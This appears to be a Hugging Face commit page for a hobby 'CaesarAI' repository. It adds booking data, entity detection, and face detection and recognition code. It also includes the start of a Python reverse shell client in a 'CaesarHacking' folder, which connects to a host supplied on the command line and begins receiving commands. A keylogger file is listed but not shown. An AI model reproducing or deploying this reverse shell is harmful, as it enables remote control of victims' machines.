Spaces:
Sleeping
Sleeping
CaesarCloudSync
commited on
Commit
·
9d3162f
0
Parent(s):
CaesarAI Deployed
Browse filesThis view is limited to 50 files because it contains too many changes.
See raw diff
- .expo/README.md +15 -0
- .expo/settings.json +8 -0
- .gitattributes +45 -0
- .gitignore +7 -0
- Bookings/alicante_bookings.json +116 -0
- CaesarDetectEntity.py +32 -0
- CaesarEssayGeneration/caesaressaygeneration.py +0 -0
- CaesarEssayGeneration/caesarparaphrasing.py +0 -0
- CaesarFaceDetection/__pycache__/caesarfd.cpython-37.pyc +0 -0
- CaesarFaceDetection/caesarfd.py +48 -0
- CaesarFaceDetection/cascades/haarcascade_fontalface_default.xml +3 -0
- CaesarFaceRecognition/__pycache__/caesardeepface.cpython-37.pyc +0 -0
- CaesarFaceRecognition/caesardeepface.py +50 -0
- CaesarFaceRecognition/testimages/amari.jpg +3 -0
- CaesarFaceRecognition/testimages/amariauth.jpg +3 -0
- CaesarFaceRecognition/testimages/img3.jpg +3 -0
- CaesarHacking/caesarReverseShell/client.py +48 -0
- CaesarHacking/caesarReverseShell/server.py +42 -0
- CaesarHacking/caesarkeylogger.py +135 -0
- CaesarHacking/test.py +3 -0
- CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-37.pyc +0 -0
- CaesarHotelBooking/__pycache__/caesarhotelbooking.cpython-39.pyc +0 -0
- CaesarHotelBooking/caesarhotelbooking.py +186 -0
- CaesarLangTranslate/caesarlangtranslate.py +73 -0
- CaesarObjectDetection/CaesarYolo.py +192 -0
- CaesarObjectDetection/README.md +20 -0
- CaesarObjectDetection/__pycache__/CaesarYolo.cpython-37.pyc +0 -0
- CaesarObjectDetection/__pycache__/CaesarYolo.cpython-39.pyc +0 -0
- CaesarObjectDetection/app.py +42 -0
- CaesarObjectDetection/cfg/yolov3.cfg +3 -0
- CaesarObjectDetection/darknet.py +463 -0
- CaesarObjectDetection/data/coco.names +3 -0
- CaesarObjectDetection/images/cat.jpg +3 -0
- CaesarObjectDetection/images/city_scene.jpg +3 -0
- CaesarObjectDetection/images/dog.jpg +3 -0
- CaesarObjectDetection/images/dog2.jpg +3 -0
- CaesarObjectDetection/images/eagle.jpg +3 -0
- CaesarObjectDetection/images/food.jpg +3 -0
- CaesarObjectDetection/images/giraffe.jpg +3 -0
- CaesarObjectDetection/images/horses.jpg +3 -0
- CaesarObjectDetection/images/man-in-black-and-white-jacket-riding-brown-horse-3596689.jpg +3 -0
- CaesarObjectDetection/images/motorbike.jpg +3 -0
- CaesarObjectDetection/images/nathan-rogers-jMmv6HhHb0k-unsplash.jpg +3 -0
- CaesarObjectDetection/images/person.jpg +3 -0
- CaesarObjectDetection/images/street.jpg +3 -0
- CaesarObjectDetection/images/surf.jpg +3 -0
- CaesarObjectDetection/read_video.py +112 -0
- CaesarObjectDetection/requirements.txt +3 -0
- CaesarObjectDetection/sendweb.py +51 -0
- CaesarObjectDetection/stop +1 -0
.expo/README.md
ADDED
@@ -0,0 +1,15 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
> Why do I have a folder named ".expo" in my project?
|
2 |
+
|
3 |
+
The ".expo" folder is created when an Expo project is started using "expo start" command.
|
4 |
+
|
5 |
+
> What do the files contain?
|
6 |
+
|
7 |
+
- "devices.json": contains information about devices that have recently opened this project. This is used to populate the "Development sessions" list in your development builds.
|
8 |
+
- "packager-info.json": contains port numbers and process PIDs that are used to serve the application to the mobile device/simulator.
|
9 |
+
- "settings.json": contains the server configuration that is used to serve the application manifest.
|
10 |
+
|
11 |
+
> Should I commit the ".expo" folder?
|
12 |
+
|
13 |
+
No, you should not share the ".expo" folder. It does not contain any information that is relevant for other developers working on the project, it is specific to your machine.
|
14 |
+
|
15 |
+
Upon project creation, the ".expo" folder is already added to your ".gitignore" file.
|
.expo/settings.json
ADDED
@@ -0,0 +1,8 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"hostType": "lan",
|
3 |
+
"lanType": "ip",
|
4 |
+
"dev": true,
|
5 |
+
"minify": false,
|
6 |
+
"urlRandomness": null,
|
7 |
+
"https": false
|
8 |
+
}
|
.gitattributes
ADDED
@@ -0,0 +1,45 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
*.7z filter=lfs diff=lfs merge=lfs -text
|
2 |
+
*.arrow filter=lfs diff=lfs merge=lfs -text
|
3 |
+
*.bin filter=lfs diff=lfs merge=lfs -text
|
4 |
+
*.bz2 filter=lfs diff=lfs merge=lfs -text
|
5 |
+
*.ckpt filter=lfs diff=lfs merge=lfs -text
|
6 |
+
*.ftz filter=lfs diff=lfs merge=lfs -text
|
7 |
+
*.gz filter=lfs diff=lfs merge=lfs -text
|
8 |
+
*.h5 filter=lfs diff=lfs merge=lfs -text
|
9 |
+
*.joblib filter=lfs diff=lfs merge=lfs -text
|
10 |
+
*.lfs.* filter=lfs diff=lfs merge=lfs -text
|
11 |
+
*.mlmodel filter=lfs diff=lfs merge=lfs -text
|
12 |
+
*.model filter=lfs diff=lfs merge=lfs -text
|
13 |
+
*.msgpack filter=lfs diff=lfs merge=lfs -text
|
14 |
+
*.npy filter=lfs diff=lfs merge=lfs -text
|
15 |
+
*.npz filter=lfs diff=lfs merge=lfs -text
|
16 |
+
*.onnx filter=lfs diff=lfs merge=lfs -text
|
17 |
+
*.ot filter=lfs diff=lfs merge=lfs -text
|
18 |
+
*.parquet filter=lfs diff=lfs merge=lfs -text
|
19 |
+
*.pb filter=lfs diff=lfs merge=lfs -text
|
20 |
+
*.pickle filter=lfs diff=lfs merge=lfs -text
|
21 |
+
*.pkl filter=lfs diff=lfs merge=lfs -text
|
22 |
+
*.pt filter=lfs diff=lfs merge=lfs -text
|
23 |
+
*.pth filter=lfs diff=lfs merge=lfs -text
|
24 |
+
*.rar filter=lfs diff=lfs merge=lfs -text
|
25 |
+
*.safetensors filter=lfs diff=lfs merge=lfs -text
|
26 |
+
saved_model/**/* filter=lfs diff=lfs merge=lfs -text
|
27 |
+
*.tar.* filter=lfs diff=lfs merge=lfs -text
|
28 |
+
*.tflite filter=lfs diff=lfs merge=lfs -text
|
29 |
+
*.tgz filter=lfs diff=lfs merge=lfs -text
|
30 |
+
*.wasm filter=lfs diff=lfs merge=lfs -text
|
31 |
+
*.xz filter=lfs diff=lfs merge=lfs -text
|
32 |
+
*.zip filter=lfs diff=lfs merge=lfs -text
|
33 |
+
*.zst filter=lfs diff=lfs merge=lfs -text
|
34 |
+
*tfevents* filter=lfs diff=lfs merge=lfs -text
|
35 |
+
*.jpg filter=lfs diff=lfs merge=lfs -text
|
36 |
+
*.names filter=lfs diff=lfs merge=lfs -text
|
37 |
+
*.cfg filter=lfs diff=lfs merge=lfs -text
|
38 |
+
*.weights filter=lfs diff=lfs merge=lfs -text
|
39 |
+
hello.mp3 filter=lfs diff=lfs merge=lfs -text
|
40 |
+
artificial[[:space:]]neural[[:space:]]networks.png filter=lfs diff=lfs merge=lfs -text
|
41 |
+
caesarapis.json filter=lfs diff=lfs merge=lfs -text
|
42 |
+
caesartriggers.json filter=lfs diff=lfs merge=lfs -text
|
43 |
+
*.caffemodel filter=lfs diff=lfs merge=lfs -text
|
44 |
+
haarcascade_fontalface_default.xml filter=lfs diff=lfs merge=lfs -text
|
45 |
+
deploy.prototxt.txt filter=lfs diff=lfs merge=lfs -text
|
.gitignore
ADDED
@@ -0,0 +1,7 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
res10_300x300_ssd_iter_140000_fp16.caffemodel
|
2 |
+
deploy.prototxt.txt
|
3 |
+
CaesarKivy
|
4 |
+
*.mp4
|
5 |
+
*.avi
|
6 |
+
*.wav
|
7 |
+
beewareenv
|
Bookings/alicante_bookings.json
ADDED
@@ -0,0 +1,116 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
{
|
2 |
+
"alicante_bookings_lower_than_2000": [
|
3 |
+
{
|
4 |
+
"address": "Alicante",
|
5 |
+
"assumed_final_price": 1976.3999999999999,
|
6 |
+
"assumed_vat": "20.0%",
|
7 |
+
"booking": "7 nights, 8 adults",
|
8 |
+
"checkin_date": "2023-8-15",
|
9 |
+
"checkout_date": "2023-8-22",
|
10 |
+
"city": "Alicante",
|
11 |
+
"distance": "0.8 miles from centre",
|
12 |
+
"location": "https://www.booking.com/hotel/es/beach-5-min-relax.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=15&hapos=15&sr_order=popularity&srpvid=01528e460f4b0724&srepoch=1672949646&all_sr_blocks=865019901_354653449_8_0_0&highlighted_blocks=865019901_354653449_8_0_0&matching_block_id=865019901_354653449_8_0_0&sr_pri_blocks=865019901_354653449_8_0_0__155288&from_beach_sr=1&from=searchresults&map=1",
|
13 |
+
"price": 1647.0,
|
14 |
+
"rating": 8.5,
|
15 |
+
"reviews": "74 reviews",
|
16 |
+
"room": "Apartment",
|
17 |
+
"title": "Beach 5 MIN Playa"
|
18 |
+
},
|
19 |
+
{
|
20 |
+
"address": "Alicante",
|
21 |
+
"assumed_final_price": 1363.2,
|
22 |
+
"assumed_vat": "20.0%",
|
23 |
+
"booking": "7 nights, 8 adults",
|
24 |
+
"checkin_date": "2023-8-15",
|
25 |
+
"checkout_date": "2023-8-22",
|
26 |
+
"city": "Alicante",
|
27 |
+
"distance": "1 miles from centre",
|
28 |
+
"location": "https://www.booking.com/hotel/es/gonzalo-mengual-apartment.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=23&hapos=23&sr_order=popularity&srpvid=01528e460f4b0724&srepoch=1672949646&all_sr_blocks=368159701_295762440_8_0_0&highlighted_blocks=368159701_295762440_8_0_0&matching_block_id=368159701_295762440_8_0_0&sr_pri_blocks=368159701_295762440_8_0_0__107100&from_beach_sr=1&from=searchresults&map=1",
|
29 |
+
"price": 1136.0,
|
30 |
+
"rating": 7.5,
|
31 |
+
"reviews": "97 reviews",
|
32 |
+
"room": "Apartment",
|
33 |
+
"title": "Very best flat with sea view, just 800m Postiguet-Beach"
|
34 |
+
},
|
35 |
+
{
|
36 |
+
"address": "Alicante",
|
37 |
+
"assumed_final_price": 1363.2,
|
38 |
+
"assumed_vat": "20.0%",
|
39 |
+
"booking": "7 nights, 8 adults",
|
40 |
+
"checkin_date": "2023-8-15",
|
41 |
+
"checkout_date": "2023-8-22",
|
42 |
+
"city": "Alicante",
|
43 |
+
"distance": "1 miles from centre",
|
44 |
+
"location": "https://www.booking.com/hotel/es/gonzalo-mengual-apartment.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=1&hapos=26&sr_order=popularity&srpvid=44078e50e09a0255&srepoch=1672949666&all_sr_blocks=368159701_295762440_8_0_0&highlighted_blocks=368159701_295762440_8_0_0&matching_block_id=368159701_295762440_8_0_0&sr_pri_blocks=368159701_295762440_8_0_0__107100&from_beach_sr=1&from=searchresults&map=1",
|
45 |
+
"price": 1136.0,
|
46 |
+
"rating": 9.2,
|
47 |
+
"reviews": "17 reviews",
|
48 |
+
"room": "Apartment",
|
49 |
+
"title": "Very best flat with sea view, just 800m Postiguet-Beach"
|
50 |
+
},
|
51 |
+
{
|
52 |
+
"address": "Alicante",
|
53 |
+
"assumed_final_price": 1959.6,
|
54 |
+
"assumed_vat": "20.0%",
|
55 |
+
"booking": "7 nights, 8 adults",
|
56 |
+
"checkin_date": "2023-8-15",
|
57 |
+
"checkout_date": "2023-8-22",
|
58 |
+
"city": "Alicante",
|
59 |
+
"distance": "0.4 miles from centre",
|
60 |
+
"location": "https://www.booking.com/hotel/es/espacioso-luminoso-coqueto-y-muy-centrico.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=18&hapos=43&sr_order=popularity&srpvid=44078e50e09a0255&srepoch=1672949666&all_sr_blocks=460841701_167414053_8_0_0&highlighted_blocks=460841701_167414053_8_0_0&matching_block_id=460841701_167414053_8_0_0&sr_pri_blocks=460841701_167414053_8_0_0__154000&from_beach_sr=1&from=searchresults&map=1",
|
61 |
+
"price": 1633.0,
|
62 |
+
"rating": 6.7,
|
63 |
+
"reviews": "4 reviews",
|
64 |
+
"room": "Apartment",
|
65 |
+
"title": "Espacioso, luminoso, coqueto, y muy céntrico"
|
66 |
+
},
|
67 |
+
{
|
68 |
+
"address": "Alicante",
|
69 |
+
"assumed_final_price": 1585.2,
|
70 |
+
"assumed_vat": "20.0%",
|
71 |
+
"booking": "7 nights, 8 adults",
|
72 |
+
"checkin_date": "2023-8-15",
|
73 |
+
"checkout_date": "2023-8-22",
|
74 |
+
"city": "Alicante",
|
75 |
+
"distance": "0.4 miles from centre",
|
76 |
+
"location": "https://www.booking.com/hotel/es/duplex-apartment-in-apart-alicante-center-with-private-terrace-and-jacuzzi.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=3&hapos=128&sr_order=popularity&srpvid=04db8e76e60c0946&srepoch=1672949742&all_sr_blocks=856186404_353169334_0_0_0%2C856186402_353169334_0_0_0&highlighted_blocks=856186404_353169334_0_0_0%2C856186402_353169334_0_0_0&matching_block_id=856186404_353169334_0_0_0&sr_pri_blocks=856186404_353169334_0_0_0__69552%2C856186402_353169334_0_0_0__55062&from_beach_sr=1&from=searchresults&map=1",
|
77 |
+
"price": 1321.0,
|
78 |
+
"rating": 8.3,
|
79 |
+
"reviews": "4 reviews",
|
80 |
+
"room": "Studio Apartment",
|
81 |
+
"title": "Happy Life Apartments"
|
82 |
+
},
|
83 |
+
{
|
84 |
+
"address": "Alicante",
|
85 |
+
"assumed_final_price": 1904.3999999999999,
|
86 |
+
"assumed_vat": "20.0%",
|
87 |
+
"booking": "7 nights, 8 adults",
|
88 |
+
"checkin_date": "2023-8-15",
|
89 |
+
"checkout_date": "2023-8-22",
|
90 |
+
"city": "Alicante",
|
91 |
+
"distance": "0.3 miles from centre",
|
92 |
+
"location": "https://www.booking.com/hotel/es/the-market-hostel.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=20&hapos=170&sr_order=popularity&srpvid=4b6a8e7ff36d0089&srepoch=1672949760&all_sr_blocks=385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0&highlighted_blocks=385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580305_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0%2C385580304_337859799_0_0_0&matching_block_id=385580305_337859799_0_0_0&sr_pri_blocks=385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580305_337859799_0_0_0__18456%2C385580304_337859799_0_0_0__19139%2C385580304_337859799_0_0_0__19139%2C385580304_337859799_0_0_0__19139&from_beach_sr=1&from=searchresults&map=1",
|
93 |
+
"price": 1587.0,
|
94 |
+
"rating": 8.7,
|
95 |
+
"reviews": "886 reviews",
|
96 |
+
"room": "Bed in 10-Bed Mixed Dormitory Room",
|
97 |
+
"title": "The Market Hostel"
|
98 |
+
},
|
99 |
+
{
|
100 |
+
"address": "Alicante",
|
101 |
+
"assumed_final_price": 1514.3999999999999,
|
102 |
+
"assumed_vat": "20.0%",
|
103 |
+
"booking": "7 nights, 8 adults",
|
104 |
+
"checkin_date": "2023-8-15",
|
105 |
+
"checkout_date": "2023-8-22",
|
106 |
+
"city": "Alicante",
|
107 |
+
"distance": "1.8 miles from centre",
|
108 |
+
"location": "https://www.booking.com/hotel/es/carrer-abad-fernandez-helguera.en-gb.html?label=gen173nr-1FCAEoggI46AdIM1gEaGyIAQGYATG4AQfIAQzYAQHoAQH4AQKIAgGoAgO4AvTIm_IFwAIB&aid=304142&ucfs=1&arphpl=1&checkin=2023-08-15&checkout=2023-08-22&group_adults=8&req_adults=8&no_rooms=5&group_children=0&req_children=0&hpos=21&hapos=171&sr_order=popularity&srpvid=4b6a8e7ff36d0089&srepoch=1672949760&all_sr_blocks=922570301_363985271_2_0_0%2C922570305_363985271_2_0_0%2C922570303_363985271_2_0_0%2C922570304_363985271_2_0_0&highlighted_blocks=922570301_363985271_2_0_0%2C922570305_363985271_2_0_0%2C922570303_363985271_2_0_0%2C922570304_363985271_2_0_0&matching_block_id=922570301_363985271_2_0_0&sr_pri_blocks=922570301_363985271_2_0_0__21000%2C922570305_363985271_2_0_0__28000%2C922570303_363985271_2_0_0__31500%2C922570304_363985271_2_0_0__38500&from_beach_sr=1&from_sustainable_property_sr=1&from=searchresults&map=1",
|
109 |
+
"price": 1262.0,
|
110 |
+
"rating": 4.2,
|
111 |
+
"reviews": "22 reviews",
|
112 |
+
"room": "Economy Double Room",
|
113 |
+
"title": "Carrer Abad Fernández Helguera"
|
114 |
+
}
|
115 |
+
]
|
116 |
+
}
|
CaesarDetectEntity.py
ADDED
@@ -0,0 +1,32 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import re
|
2 |
+
import spacy
|
3 |
+
import gtts
|
4 |
+
class CaesarDetectEntity:
|
5 |
+
def __init__(self):
|
6 |
+
self.languages = {v: k for k, v in gtts.lang.tts_langs().items()}
|
7 |
+
self.NER = spacy.load("en_core_web_sm")
|
8 |
+
self.main_entities = {"email":"ORG","translate":"NORP"}
|
9 |
+
def index_of_word(self,word,text):
|
10 |
+
matches_start = re.finditer(word.lower(), text.lower())
|
11 |
+
matches_position_start = [match.start() for match in matches_start]
|
12 |
+
|
13 |
+
# matches_position_end will be a list of ending index positions
|
14 |
+
matches_end = re.finditer(word.lower(), text.lower())
|
15 |
+
matches_position_end = [match.end() for match in matches_end]
|
16 |
+
return matches_position_start[0],matches_position_end[0]
|
17 |
+
def show_entites(self,text):
|
18 |
+
text1 = self.NER(text)
|
19 |
+
for word in text1.ents:
|
20 |
+
print(word.text,word.label_)
|
21 |
+
def run(self,word,text,entity="NORP"):
|
22 |
+
try:
|
23 |
+
text1= self.NER(text)
|
24 |
+
target_lang = [word.text for word in text1.ents if word.label_ == entity][0]
|
25 |
+
source_text = text[self.index_of_word(word,text)[-1]:self.index_of_word(target_lang,text)[0]].replace(" to","").replace(" into","").replace(" in","").strip()
|
26 |
+
#api_call = f"translate({source_text},'{self.languages[target_lang.capitalize()]}')"
|
27 |
+
return source_text,self.languages[target_lang.capitalize()]
|
28 |
+
except (IndexError,KeyError) as kex:
|
29 |
+
source_text = text[self.index_of_word(word,text)[-1]:].replace(" to","").replace(" into","").replace(" in","").strip()
|
30 |
+
#api_call = f"translate({source_text},'{self.languages[target_lang.capitalize()]}')"
|
31 |
+
languages = None
|
32 |
+
return source_text,languages
|
CaesarEssayGeneration/caesaressaygeneration.py
ADDED
File without changes
|
CaesarEssayGeneration/caesarparaphrasing.py
ADDED
File without changes
|
CaesarFaceDetection/__pycache__/caesarfd.cpython-37.pyc
ADDED
Binary file (1.65 kB). View file
|
|
CaesarFaceDetection/caesarfd.py
ADDED
@@ -0,0 +1,48 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import cv2
|
2 |
+
import numpy as np
|
3 |
+
|
4 |
+
|
5 |
+
|
6 |
+
class CaesarFaceDetection:
|
7 |
+
def __init__(self) -> None:
|
8 |
+
# https://raw.githubusercontent.com/opencv/opencv/master/samples/dnn/face_detector/deploy.prototxt
|
9 |
+
prototxt_path = "CaesarFaceDetection/weights/deploy.prototxt.txt"
|
10 |
+
# https://raw.githubusercontent.com/opencv/opencv_3rdparty/dnn_samples_face_detector_20180205_fp16/res10_300x300_ssd_iter_140000_fp16.caffemodel
|
11 |
+
model_path = "CaesarFaceDetection/weights/res10_300x300_ssd_iter_140000_fp16.caffemodel"
|
12 |
+
|
13 |
+
# load Caffe model
|
14 |
+
self.model = cv2.dnn.readNetFromCaffe(prototxt_path, model_path)
|
15 |
+
def detect_face(self,image, showtext=False,snapcropface=False):
|
16 |
+
h, w = image.shape[:2]
|
17 |
+
# preprocess the image: resize and performs mean subtraction
|
18 |
+
blob = cv2.dnn.blobFromImage(image, 1.0, (300, 300), (104.0, 177.0, 123.0))
|
19 |
+
# set the image into the input of the neural network
|
20 |
+
self.model.setInput(blob)
|
21 |
+
# perform inference and get the result
|
22 |
+
output = np.squeeze(self.model.forward())
|
23 |
+
font_scale = 1.0
|
24 |
+
for i in range(0, output.shape[0]):
|
25 |
+
# get the confidence
|
26 |
+
confidence = output[i, 2]
|
27 |
+
# if confidence is above 50%, then draw the surrounding box
|
28 |
+
if confidence > 0.5:
|
29 |
+
# get the surrounding box cordinates and upscale them to original image
|
30 |
+
box = output[i, 3:7] * np.array([w, h, w, h])
|
31 |
+
# convert to integers
|
32 |
+
start_x, start_y, end_x, end_y = box.astype(np.int)
|
33 |
+
# draw the rectangle surrounding the face
|
34 |
+
start_point = (start_x, start_y)
|
35 |
+
end_point = (end_x, end_y)
|
36 |
+
if snapcropface == True:
|
37 |
+
factor_add = 20
|
38 |
+
crop_img = image[start_y- factor_add:end_y+ factor_add, start_x- factor_add:end_x + factor_add]
|
39 |
+
return crop_img
|
40 |
+
#cv2.imshow("cropped", crop_img)
|
41 |
+
#cv2.waitKey(0)
|
42 |
+
|
43 |
+
cv2.rectangle(image,start_point,end_point, color=(255, 0, 0), thickness=2)
|
44 |
+
# draw text as well
|
45 |
+
if showtext == True:
|
46 |
+
cv2.putText(image, f"{confidence*100:.2f}%", (start_x, start_y-5), cv2.FONT_HERSHEY_SIMPLEX, font_scale, (255, 0, 0), 2)
|
47 |
+
if snapcropface != True:
|
48 |
+
return image
|
CaesarFaceDetection/cascades/haarcascade_fontalface_default.xml
ADDED
@@ -0,0 +1,3 @@
|
|
|
|
|
|
|
|
|
1 |
+
version https://git-lfs.github.com/spec/v1
|
2 |
+
oid sha256:a1b5468d67aa6c291f3b1d2bf98181844e4d0433c31d696a2198029e0e94bc7b
|
3 |
+
size 930126
|
CaesarFaceRecognition/__pycache__/caesardeepface.cpython-37.pyc
ADDED
Binary file (2.3 kB). View file
|
|
CaesarFaceRecognition/caesardeepface.py
ADDED
@@ -0,0 +1,50 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
from deepface import DeepFace
|
2 |
+
|
3 |
+
class CaesarDeepFace:
|
4 |
+
"""
|
5 |
+
https://github.com/serengil/deepface
|
6 |
+
"""
|
7 |
+
def __init__(self) -> None:
|
8 |
+
self.metrics = ["cosine", "euclidean", "euclidean_l2"]
|
9 |
+
self.models = ["VGG-Face", "Facenet", "Facenet512", "OpenFace", "DeepFace", "DeepID", "ArcFace", "Dlib", "SFace"]
|
10 |
+
self.backends = [
|
11 |
+
'opencv',
|
12 |
+
'ssd',
|
13 |
+
'dlib',
|
14 |
+
'mtcnn',
|
15 |
+
'retinaface',
|
16 |
+
'mediapipe'
|
17 |
+
]
|
18 |
+
def face_authentication(self,filename1="img1.jpg",filename2="img2.jpg"):
|
19 |
+
#face verification
|
20 |
+
# Value Error
|
21 |
+
try:
|
22 |
+
result = DeepFace.verify(img1_path =filename1 ,
|
23 |
+
img2_path = filename2,
|
24 |
+
distance_metric = self.metrics[0],
|
25 |
+
model_name = self.models[0],
|
26 |
+
detector_backend = self.backends[0]
|
27 |
+
)
|
28 |
+
return result
|
29 |
+
except ValueError as vex:
|
30 |
+
return {"message":"Face wasn't detected","error":f"{type(vex)},{vex}"}
|
31 |
+
def face_recognition(self,filename,db_path="C:/workspace/my_db"):
|
32 |
+
dfs = DeepFace.find(img_path =filename,
|
33 |
+
db_path = db_path,
|
34 |
+
distance_metric = self.metrics[2])
|
35 |
+
return dfs
|
36 |
+
def face_analyze(self,filename="img1.jpg"):
|
37 |
+
objs = DeepFace.analyze(img_path = filename,
|
38 |
+
actions = ['age', 'gender', 'race', 'emotion'])
|
39 |
+
return objs
|
40 |
+
def face_embeddigns(self,filename):
|
41 |
+
embedding_objs = DeepFace.represent(img_path = filename)
|
42 |
+
return embedding_objs
|
43 |
+
def face_streaming(self,db_path="C:/User/Sefik/Desktop/database"):
|
44 |
+
DeepFace.stream(db_path = db_path)
|
45 |
+
|
46 |
+
|
47 |
+
if __name__ == "__main__":
|
48 |
+
caesardeepface = CaesarDeepFace()
|
49 |
+
result = caesardeepface.face_authentication(filename2="img3.jpg")
|
50 |
+
print(result)
|
CaesarFaceRecognition/testimages/amari.jpg
ADDED
![]() |
Git LFS Details
|
CaesarFaceRecognition/testimages/amariauth.jpg
ADDED
![]() |
Git LFS Details
|
CaesarFaceRecognition/testimages/img3.jpg
ADDED
![]() |
Git LFS Details
|
CaesarHacking/caesarReverseShell/client.py
ADDED
@@ -0,0 +1,48 @@
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
1 |
+
import socket
|
2 |
+
import os
|
3 |
+
import subprocess
|
4 |
+
import sys
|
5 |
+
|
6 |
+
SERVER_HOST = sys.argv[1]
|
7 |
+
SERVER_PORT = 5003
|
8 |
+
BUFFER_SIZE = 1024 * 128 # 128KB max size of messages, feel free to increase
|
9 |
+
# separator string for sending 2 messages in one go
|
10 |
+
SEPARATOR = "<sep>"
|
11 |
+
|
12 |
+
# create the socket object
|
13 |
+
s = socket.socket()
|
14 |
+
# connect to the server
|
15 |
+
s.connect((SERVER_HOST, SERVER_PORT))
|
16 |
+
|
17 |
+
# get the current directory
|
18 |
+
cwd = os.getcwd()
|
19 |
+
s.send(cwd.encode())
|
20 |
+
|
21 |
+
|
22 |
+
while True:
|
23 |
+
# receive the command from the server
|
24 |
+
command = s.recv(BUFFER_SIZE).decode()
|
25 |
+
splited_command = command.split()
|
